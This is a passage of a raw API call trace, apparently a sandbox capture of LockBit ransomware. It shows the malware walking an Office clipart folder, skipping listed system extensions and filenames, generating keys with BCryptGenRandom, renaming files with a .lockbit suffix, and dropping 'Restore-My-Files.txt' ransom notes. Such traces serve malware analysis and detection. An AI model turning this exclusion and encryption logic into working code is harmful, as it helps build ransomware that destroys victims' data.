NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.839] malloc (_Size=0xa6) returned 0x77d7a8 [0120.839] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.840] free (_Block=0x77d7a8) [0120.840] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.840] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.840] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x60b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099145.JPG", cAlternateFileName="")) returned 1 [0120.840] lstrcmpiW (lpString1=".", lpString2="J0099145.JPG") returned -1 [0120.841] lstrcmpiW (lpString1="..", lpString2="J0099145.JPG") returned -1 [0120.841] PathFindExtensionW (pszPath="J0099145.JPG") returned=".JPG" [0120.841] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0120.841] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0120.841] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0120.842] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0120.842] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0120.843] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0120.843] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0120.843] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0120.843] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099145.JPG") returned 1 [0120.843] lstrcmpiW (lpString1="ntldr", lpString2="J0099145.JPG") returned 1 [0120.843] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099145.JPG") returned 1 [0120.843] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099145.JPG") returned -1 [0120.843] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099145.JPG") returned -1 [0120.843] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099145.JPG") returned 1 [0120.843] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099145.JPG") returned -1 [0120.843] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.843] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned=".JPG" [0120.843] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0120.843] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0120.843] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0120.843] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0120.844] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0120.844] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0120.845] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.lockbit") returned 72 [0120.845] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0120.845] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.845] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.846] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24759) returned 1 [0120.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.847] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.852] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.852] malloc (_Size=0xa6) returned 0x77d7a8 [0120.852] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.863] free (_Block=0x77d7a8) [0120.863] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.863] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.863] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x40d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099146.WMF", cAlternateFileName="")) returned 1 [0120.863] lstrcmpiW (lpString1=".", lpString2="J0099146.WMF") returned -1 [0120.863] lstrcmpiW (lpString1="..", lpString2="J0099146.WMF") returned -1 [0120.863] PathFindExtensionW (pszPath="J0099146.WMF") returned=".WMF" [0120.863] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.863] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.864] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.864] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099146.WMF") returned 1 [0120.865] lstrcmpiW (lpString1="ntldr", lpString2="J0099146.WMF") returned 1 [0120.865] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099146.WMF") returned 1 [0120.865] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099146.WMF") returned -1 [0120.865] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099146.WMF") returned -1 [0120.865] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099146.WMF") returned 1 [0120.865] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099146.WMF") returned -1 [0120.865] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.865] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned=".WMF" [0120.865] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.865] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.865] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.866] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.866] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.lockbit") returned 72 [0120.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0120.867] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.867] malloc (_Size=0x40068) returned 0x3df0008 [0120.867] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16596) returned 1 [0120.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.869] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.890] malloc (_Size=0xa6) returned 0x77d7a8 [0120.891] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.892] free (_Block=0x77d7a8) [0120.892] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.892] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.892] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.892] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x5f39, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099147.JPG", cAlternateFileName="")) returned 1 [0120.892] lstrcmpiW (lpString1=".", lpString2="J0099147.JPG") returned -1 [0120.892] lstrcmpiW (lpString1="..", lpString2="J0099147.JPG") returned -1 [0120.892] PathFindExtensionW (pszPath="J0099147.JPG") returned=".JPG" [0120.892] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0120.892] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0120.892] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0120.892] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0120.892] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0120.892] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0120.892] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0120.892] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0120.892] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0120.893] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0120.893] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0120.894] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099147.JPG") returned 1 [0120.894] lstrcmpiW (lpString1="ntldr", lpString2="J0099147.JPG") returned 1 [0120.894] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099147.JPG") returned 1 [0120.894] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099147.JPG") returned -1 [0120.894] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099147.JPG") returned -1 [0120.894] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099147.JPG") returned 1 [0120.894] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099147.JPG") returned -1 [0120.894] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.894] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned=".JPG" [0120.894] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0120.894] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0120.894] 